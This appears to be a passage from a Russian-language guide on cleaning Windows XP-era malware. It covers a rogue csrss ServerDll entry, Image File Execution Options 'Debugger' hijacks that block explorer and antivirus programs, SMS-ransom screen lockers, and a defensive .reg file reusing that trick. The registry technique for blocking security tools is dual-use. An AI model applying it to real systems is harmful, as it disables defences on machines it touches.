ServerDll=basepvllk32 (или какую либо другую dll, отличную от basesrv и winsrv)
Что обеспечит, при следующей перезагрузке, получение управления вредоносной программе. Если же ваш антивирус обнаружит и удалит внедренную basepvllk32, оставив нетронутой запись в реестре, то загрузка системы завершится «синим экраном смерти» (BSOD) с ошибкой STOP c000135 и сообщением о невозможности загрузить basepvllk32.
Поправить ситуацию можно так:
— загрузится в консоль восстановления (или в любой другой системе), и скопировать файл basesrv.dll из папки C:WINDOWSsystem32 в ту же папку под именем basepvllk32.dll. После чего система загрузится и можно будет вручную подправить запись в реестре.
— загрузиться с использованием Winternals ERD Commander и исправить запись в реестре на ServerDll=basesrv . Или выполнить откат системы с использованием точки восстановления.
    Еще один характерный пример. Вредоносная программ регистрируется как отладчик процесса explorer.exe, создавая в реестре запись типа:
HKMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsexplorer.exe
«Debugger»=»C:Program FilesMicrosoft Commonwuauclt.exe»
Удаление wuauclt.exe антивирусом без удаления записи в реестре приводит к невозможности запуска explorer.exe. В результате вы получаете пустой рабочий стол, без каких-либо кнопок и ярлыков. Выйти из положения можно используя комбинацию клавиш CTRL-ALT-DEL. Выбираете «Диспетчер задач» — «Новая задача» — «Обзор» — находите и запускаете редактор реестра regedit.exe. Затем удаляете ключ
HKMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsexplorer.exe
и перезагружаетесь.
    В случае, когда вы точно знаете время заражения системы, откат на точку восстановления до этого события, является довольно надежным способом избавления от заразы. Иногда есть смысл выполнять не полный откат, а частичный, с восстановлением файла реестра SYSTEM, как это описано в статье «Проблемы с загрузкой ОС» раздела «Windows»
    == Май 2008. ==
    Это дополнение возникло через год после написания основной статьи. Здесь я решил разместить наиболее интересные решения, возникшие в процессе борьбы с вредоносным программным обеспечением. Что-то вроде коротких заметок.
После удаления вируса ни один антивирус не работает.
    Случай интересен тем, что способ блокировки антивирусного программного обеспечения можно использовать и в борьбе с исполняемыми файлами вирусов. Началось все с того, что после удаления довольно примитивного вируса не заработал лицензионный «Стрим Антивирус». Переустановки с чисткой реестра не помогли. Попытка установки Avira Antivir Personal Free закончилась успешно, но сам антивирус не запустился. В системном журнале было сообщение о таймауте при запуске службы «Avira Antivir Guard». Перезапуск вручную заканчивался той же ошибкой. Причем, никаких лишних процессов в системе не выполнялось. Была стопроцентная уверенность — вирусов, руткитов и прочей гадости (Malware) в системе нет.
    В какой-то момент попробовал запустить антивирусную утилиту AVZ. Принцип работы AVZ во многом основан на поиске в изучаемой системе разнообразных аномалий. С одной стороны, это помогает в поиске Malware, но с другой вполне закономерны подозрения к компонентам антивирусов, антишпионов и прочего легитимного ПО, активно взаимодействующего с системой. Для подавления реагирования AVZ на легитимные объекты и упрощения анализа результатов проверки системы за счет отметки легитимных объектов цветом и их фильтрации из логов, применяется база безопасных файлов AVZ. С недавнего времени запущен полностью автоматический сервис, позволяющий всем желающим прислать файлы для пополнения этой базы.
Но : исполняемый файл avz.exe не запустился ! Переименовываю avz.exe в musor.exe — все прекрасно запускается. В очередной раз AVZ оказался незаменимым помощником в решении проблемы. При выполнении проверок в результатах появилась строки:
Опасно — отладчик процесса «avz.exe»=»ntsd-d»
Опасно — отладчик процесса «avguard.exe»=»ntsd-d»
:.
Это была уже серьезная зацепка. Поиск в реестре по контексту «avz» привел к обнаружению в ветке
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options
раздела с именем avz.exe , содержащем строковый параметр с именем «Debugger» и значением «ntsd -d» .
И, как выяснилось позже, в указанной ветке присутствовал не только раздел «avz.exe», но и разделы с именами исполняемых модулей практически всех известных антивирусов и некоторых утилит мониторинга системы. Сам ntsd.exe — вполне легальный отладчик Windows, стандартно присутствующий во всех версиях ОС, но подобная запись в реестре приводит к невозможности запуска приложения, имя исполняемого файла которого совпадает с именем раздела . exe.
    После удаления из реестра всех разделов, c именем . exe и содержащих запись «Debugger» = «ntsd -d» работоспособность системы полностью восстановилась.
В результате анализа ситуации с использованием параметра «ntsd -d» для блокировки запуска исполняемых файлов, появилась мысль использовать этот же прием для борьбы с самими вирусами. Конечно, это не панацея, но в какой-то степени может снизить угрозу заражения компьютера вирусами с известными именами исполняемых файлов. Для того, чтобы в системе невозможно было выполнить файлы с именами ntos.exe, file.exe, system32.exe и т.п. можно создать reg-файл для импорта в реестр:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsNTOS.EXE]
«Debugger»=»ntsd -d»
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsFILE.EXE]
«Debugger»=»ntsd -d»
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution OptionsSYSTEM32.EXE]
«Debugger»=»ntsd -d»
. и т.д.
Обратите внимание, на то, что имя раздела не содержат пути файла, поэтому данный способ нельзя применять для файлов вирусов, имена которых совпадают с именами легальных исполняемых файлов, но сами файлы нестандартно размещены в файловой системе. Например, проводник Explorer.exe находится в папке WINDOWS, а вирус располагается где-то в другом месте — в корне диска, в папке temp, windowssystem32 Если вы создадите раздел с именем «Explorer.exe» — то после входа в систему вы получите пустой рабочий стол, поскольку проводник не запустится. Хуже того, если вы создадите раздел, имя которого совпадает с именем системной службы (winlogon.exe, csrss.exe, smss.exe, services.exe, lsass.exe), то получите рухнувшую систему. Если вирус находится в C:tempwinlogon.exe, а легальный модуль входа в систему C:WINDOWSSYSTEM32winlogon.exe, создание раздела с именем winlogon.exe приведет к невозможности запуска службы winlogon и краху системы с синим экраном смерти (BSOD).
По этой ссылке вы можете скачать .reg-файл с подборкой из имен файлов, наиболее часто используемых актуальными вирусами. После импорта в реестр, в случае попытки выполнения файла с именем, присутствующем в заготовке, вы получите подобное окно:
Если у вас возникнут проблемы с легальной программой, имя исполняемого файла которой совпало с именем, используемым вредоносным ПО, откройте раздел реестра
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options
и удалите подраздел с данным именем. Для удобства, имена с параметром «ntsd -d» я выделил заглавными буквами.
    Основная цель современных вирусописателей — заработать деньги любым способом. В последнее время участилось использование вируса для блокировки рабочего стола пользователя и вывод сообщения, предлагающего отправить СМС на определенный (как правило, короткий) номер для разблокировки. Подобное сообщение может сопровождаться отображением какого — нибудь порнобаннера или предупреждения об использовании нелицензионного программного обеспечения, или даже о потере данных при попытке переустановки системы. Встречаются даже вирусы, нагло заявляющие, что «Данный программный продукт не является вирусом». Еще одна особенность этой разновидности вредоносного ПО заключается в том, что максимально затруднен запуск каких-либо программ, не работают стандартные комбинации клавиш, запрещено использование редактора реестра, невозможно зайти на антивирусные сайты и т.п. Подобные вирусы не маскируют, а наоборот — демонстрируют свое присутствие в системе и максимально затрудняют возможность выполнить любые действия на компьютере. Практически, рабочий стол пользователя заблокирован, и никакие действия невозможны.
Другими словами — пользователю настойчиво указывается единственный выход — отправить СМС. После отправки с баланса мобильного телефона будет снята некоторая сумма в пользу мошенников. Код разблокировки вы, скорее всего, не получите, и вернетесь к той же ситуации. Хотя, справедливости ради, стоит отметить, что ранние разновидности вируса-вымогателя (Trojan.Winlock) вели себя довольно «прилично» — самоуничтожались через какое-то время (несколько часов) или сразу после ввода полученного кода разблокировки.
    На сайте антивирусной компании «Доктор Веб» есть специальная форма для генерации кода разблокировки.
    Но, все же, надеяться на то, что запрашиваемый вирусом код, подойдет в каждом конкретном случае, не стоит. Как не стоит надеяться на честное самоуничтожение вируса, и тем более, не стоит отправлять СМС. Любой вирус можно удалить, даже если он не обнаруживается антивирусами. Методики удаления вируса-вымогателя ничем не отличаются от методик удаления любого другого вредоносного ПО, с одним, пожалуй, отличием — не стоит тратить время на попытки справиться с дрянью в среде зараженной системы, разве что для развития собственных навыков и пополнения знаний.
Наиболее простой и эффективный путь — загрузиться с использованием другой, незараженной системы и, подключившись к зараженной, удалить файлы вируса и исправить внесенные им записи в реестре. Об этом я уже писал выше, в основной части статьи, а здесь попытаюсь просто изложить несколько кратких вариантов удаления вируса.
— Переходите на диск зараженной системы и просматриваете системные каталоги на наличие исполняемых файлов и файлов драйверов с датой создания близкой к дате заражения. Перемещаете эти файлы в отдельную папку. Обратите внимание на каталоги
Windows
Windowssystem32
Windowssystem32drivers
WindowsTasks
RECYCLER
System Volume Information
Каталоги пользователей Documents And SettingsAll Users и Documents And Settingsимя пользователя
Очень удобно использовать для поиска таких файлов FAR Manager, с включенной сортировкой по дате для панели, где отображается содержимое каталога (комбинация CTRL-F5). Особое внимание стоит обратить на скрытые исполняемые файлы. Существует также эффективная и простая утилита от Nirsoft — SearchMyFiles, применение которой позволяет, в подавляющем большинстве случаев, легко обнаружить вредоносные файлы даже без использования антивируса. Способ обнаружения вредоносных файлов по времени создания (Creation time)
— Подключаетесь к реестру зараженной системы и ищете в нем ссылки на имена этих файлов. Сам реестр не мешает предварительно скопировать (полностью или, по крайней мере, те части, где встречаются выше указанные ссылки). Сами ссылки удаляете или изменяете в них имена файлов на другие, например — file.exe на file.ex_, server.dll на server.dl_, driver.sys на driver.sy_.
Данный способ не требует особых знаний и в случаях, когда вирус не меняет дату модификации своих файлов (а это пока встречается очень редко) — дает положительный эффект. Даже если вирус не обнаруживается антивирусами.
— Если предыдущие методики не дали результата, остается одно — ручной поиск возможных вариантов запуска вируса. В меню Administrative Tools ERD Commander’а имеются пункты:
Autoruns — информация о параметрах запуска приложений и оболочке пользователя.
Service and Driver Manager — информация о службах и драйверах системы.
Полезные ссылки по теме.
Простейшие способы нейтрализации вирусов в среде Windows 7 — В качестве продолжения темы — как избавиться от вирусов с помощью стандартных средств операционной системы Windows Vista Windows 7. Использование безопасного режима с поддержкой командной строки.
Использование загрузочного диска Winternals ERD Commander — Подробная инструкция по применению диска аварийного восстановления системы, созданного на базе Microsoft Diagnostic and Recovery Toolset (MS DaRT) .
Сайт Олега Зайцева, автора AVZ. — Посвящен информационной безопасности, и в частности — применению одной из наиболее эффективных антивирусных утилит AVZ.
Восстановление системы после вирусного заражения Как восстановить работоспособность Windows после удаления вируса, повредившего некоторые настройки. Помогает в случаях, когда не запускаются программы, при подмене страниц, открываемых обозревателем, подмене домашней страницы, страницы поиска, при изменении настроек рабочего стола, невозможности запуска редактора реестра, отсутствии доступа в Интернет, недоступности некоторых сайтов и т.п.
Если вы желаете поделиться ссылкой на эту страницу в своей социальной сети, пользуйтесь кнопкой «Поделиться»
comp0.ru